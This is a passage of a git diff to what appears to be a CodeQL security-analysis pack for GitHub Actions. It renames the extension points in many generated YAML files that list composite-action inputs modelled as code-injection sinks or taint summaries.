"generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b787..01b77b7ccc6d 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83feb..edbd28d401bf 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae3049..4b31bd66c5a6 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b4482695..a186fa070b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bddeb..92ee2971e3a2 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd7..07b8e96bfe29 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd0014586..2a2a5baab45d 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a90..274fab01e921 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc17..3671de9e58af 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a34784..2ef34dac8ba7 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c25..d76f20031e7e 100644 
--- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baaa..eccb5dae2bd7 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e6..3cbd3330ccd1 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf68..73c9c1f24a2b 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ffb..90c4f699308a 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e82..ed4e8820c998 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d167..df51b9fe4c84 100644 
--- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d5..8fca8591ceb6 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e4241..819728cf7187 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d5..d3eaca780b40 100644 
--- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8f..42c00ea216b4 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b7..a93d6a039d43 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9c..8a7784a6f01e 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3b..1b22d43bfad8 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b840..7175dd9450b4 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c69830..dca0f00a4ec8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f44..5f75d4fd0cd2 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc485..d34a6a1a3885 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc5..b7c5f7e214c1 100644 
--- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68de..eead3b5ace31 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd4061..be7043cfdbfc 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a3..36bdef9ad9ae 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c8..3d66b07df9f1 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464e..2f8a3fbdfa6f 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e6..e1acb54c7247 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344f..0a51c7087996 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd2433..0ee56c05777d 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329fb..f17216cf1e8c 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd7..551010c6634d 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb4..bd64e336c171 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff8..7d5454518675 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b094..1ad4a2b824df 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f38..60381d41f16b 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115b..ac61ed797d52 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b152..7eed41f755ed 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc4..f977f6a5cce1 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed761..c4bacdc9c2c7 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe17..f4ee49207979 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f782746230..5fae95e5defb 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba01..4115d6c98f71 100644 
